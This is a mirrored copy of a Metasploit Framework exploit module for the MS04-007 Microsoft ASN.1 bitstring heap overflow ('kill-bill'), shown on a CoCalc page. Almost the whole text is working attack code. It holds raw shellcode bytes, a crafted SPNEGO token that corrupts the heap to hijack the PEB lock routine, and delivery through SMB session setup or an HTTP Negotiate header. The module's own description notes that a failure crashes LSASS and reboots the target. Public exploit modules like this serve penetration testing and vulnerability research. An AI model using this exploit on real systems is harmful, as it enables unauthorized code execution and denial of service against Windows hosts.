CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms04_007_killbill.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = LowRanking

8


9
  include Msf::Exploit::Remote::SMB::Client

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow',

14
      'Description'    => %q{

15
          This is an exploit for a previously undisclosed

16
        vulnerability in the bit string decoding code in the

17
        Microsoft ASN.1 library. This vulnerability is not related

18
        to the bit string vulnerability described in eEye advisory

19
        AD20040210-2. Both vulnerabilities were fixed in the

20
        MS04-007 patch.  Windows 2000 SP4 Rollup 1 also patches this

21
        vulnerability.

22


23
        You are only allowed one attempt with this vulnerability. If

24
        the payload fails to execute, the LSASS system service will

25
        crash and the target system will automatically reboot itself

26
        in 60 seconds. If the payload succeeds, the system will no

27
        longer be able to process authentication requests, denying

28
        all attempts to login through SMB or at the console. A

29
        reboot is required to restore proper functioning of an

30
        exploited system.

31


32
        This exploit has been successfully tested with the win32/*/reverse_tcp

33
        payloads, however a few problems were encountered when using the

34
        equivalent bind payloads. Your mileage may vary.

35


36
      },

37
      'Author'         => [ 'Solar Eclipse <solareclipse[at]phreedom.org>' ],

38
      'License'        => BSD_LICENSE,

39
      'References'     =>

40
        [

41
          [ 'CVE', '2003-0818'],

42
          [ 'OSVDB', '3902' ],

43
          [ 'BID', '9633'],

44
          [ 'MSB', 'MS04-007'],

45
        ],

46
      'DefaultOptions' =>

47
        {

48
          'EXITFUNC' => 'thread'

49
        },

50
      'Privileged'     => true,

51
      'Payload'        =>

52
        {

53
          'Space'    => 1024,

54
          'StackAdjustment' => -3500,

55
        },

56
      'Platform'       => 'win',

57
      'Targets'        =>

58
        [

59
          [

60
            'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)

61
            {

62
              'Platform' => 'win',

63
            },

64
          ],

65
        ],

66
      'Notes'          =>

67
        {

68
          'AKA'         => [ 'kill-bill' ],

69
          'Reliability' => [ UNRELIABLE_SESSION ],

70
          'Stability'   => [ CRASH_OS_RESTARTS, CRASH_SERVICE_DOWN ]

71
        },

72
      'DisclosureDate' => '2004-02-10',

73
      'DefaultTarget' => 0))

74


75
    register_options [

76
      OptEnum.new('PROTO', [true, 'Which protocol to use', 'smb', %w[smb http]]),

77
    ]

78


79
    deregister_options('SMB::ProtocolVersion')

80
  end

81


82
  # This exploit is too destructive to use during automated exploitation.

83
  # Better Windows-based exploits exist at this time (Sep 2006)

84
  def autofilter

85
    false

86
  end

87


88
  # This is a straight port of Solar Eclipse's "kill-bill" exploit, published

89
  # as a Metasploit Framework module with his permission. This module is only

90
  # licensed under GPLv2, keep this in mind if you embed the Framework into

91
  # a non-GPL application. -hdm[at]metasploit.com

92


93
  def exploit

94


95
    # The first stage shellcode fixes the PEB pointer and cleans the heap

96
    stage0 =

97
      "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+

98
      "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+

99
      "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+

100
      "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+

101
      "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+

102
      "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+

103
      "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+

104
      "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+

105
      "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+

106
      "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+

107
      "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+

108
      "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+

109
      "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+

110
      "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+

111
      "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+

112
      "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+

113
      "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+

114
      "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+

115
      "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+

116
      "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+

117
      "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+

118
      "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+

119
      "\x08\x00\xeb\xfe"

120


121
    token = spnego_token(stage0, payload.encoded)

122


123
    case datastore['PROTO']

124
      when 'smb'

125
        exploit_smb(token)

126
      when 'http'

127
        exploit_http(token)

128
      else

129
        print_status("Invalid application protocol specified, use smb or http")

130
    end

131
  end

132


133


134
  def exploit_smb(token)

135
    connect(versions: [1])

136


137
    client = Rex::Proto::SMB::Client.new(sock)

138


139
    begin

140
      client.session_request(smb_hostname()) if not datastore['SMBDirect']

141
      client.negotiate

142
      client.session_setup_with_ntlmssp_blob(token)

143
    rescue => e

144
      if (e.to_s =~ /error code 0x00050001/)

145
        print_error("The target system has already been exploited")

146
      else

147
        print_error("Error: #{e}")

148
      end

149
    end

150


151
    handler

152
    disconnect

153
  end

154


155
  def exploit_http(token)

156
    connect(versions: [1])

157


158
    req = "GET / HTTP/1.0\r\n"

159
    req << "Host: #{ datastore['RHOST']}\r\n"

160
    req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

161


162
    sock.put(req)

163
    res = sock.get_once

164


165
    if (res and res =~ /0x80090301/)

166
      print_error("This server does not support the Negotiate protocol or has already been exploited")

167
    end

168


169
    if (res and res =~ /0x80090304/)

170
      print_error("This server responded with error code 0x80090304 (wth?)")

171
    end

172


173
    handler

174
    disconnect

175
  end

176


177


178
  # Returns an ASN.1 encoded string

179
  def enc_asn1(str)

180
    Rex::Proto::NTLM::Utils::asn1encode(str)

181
  end

182


183
  # Returns an ASN.1 encoded bit string with 0 unused bits

184
  def enc_bits(str)

185
    "\x03" + enc_asn1("\x00" + str)

186
  end

187


188
  # Returns a BER encoded constructed bit string

189
  def enc_constr(*str_arr)

190
    "\x23" + enc_asn1(str_arr.join(''))

191
  end

192


193
  # Returns a BER encoded SPNEGO token

194
  def spnego_token(stage0, stage1)

195


196
    if !(stage0 and stage1)

197
      print_status("Invalid parameters passed to spnego_token")

198
      return

199
    end

200


201
    if (stage0.length > 1032)

202
      print_status("The stage 0 shellcode is longer than 1032 bytes")

203
      return

204
    end

205


206
    tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

207


208
    if ((tag.length + stage1.length) > 1033)

209
      print_status("The stage 1 shellcode is too long")

210
      return

211
    end

212


213


214
    # The first two overwrites must succeed, so we write to an unused location

215
    # in the PEB block. We don't care about the values, because after this the

216
    # doubly linked list of free blocks is corrupted and we get to the second

217
    # overwrite which is more useful.

218


219
    fw = "\xf8\x0f\x01\x00"		# 0x00010ff8

220
    bk = "\xf8\x0f\x01"

221


222
    # The second overwrite writes the address of our shellcode into the

223
    # FastPebLockRoutine pointer in the PEB

224


225
    peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

226


227
    bitstring = enc_constr(

228
      enc_bits("A" * 1024),

229
      "\x03\x00",

230
      enc_constr(

231
        enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),

232
        enc_constr( enc_bits(fw + bk) ),

233
        enc_constr(

234
          enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),

235
          enc_constr(

236
            enc_bits("\xeb\x06" + make_nops(6)),

237
            enc_bits("D" * 1040)

238
          )

239
        )

240
      )

241
    )

242


243
    token = "\x60" + enc_asn1(                 # Application Constructed Object

244
      "\x06\x06\x2b\x06\x01\x05\x05\x02" +   # SPNEGO OID

245
      "\xa0" + enc_asn1(					   # NegTokenInit (0xa0)

246
        "\x30" + enc_asn1(

247
          "\xa1" + enc_asn1(

248
            bitstring

249
          )

250
        )

251
      )

252
    )

253


254
    return token

255
  end

256
end

257


258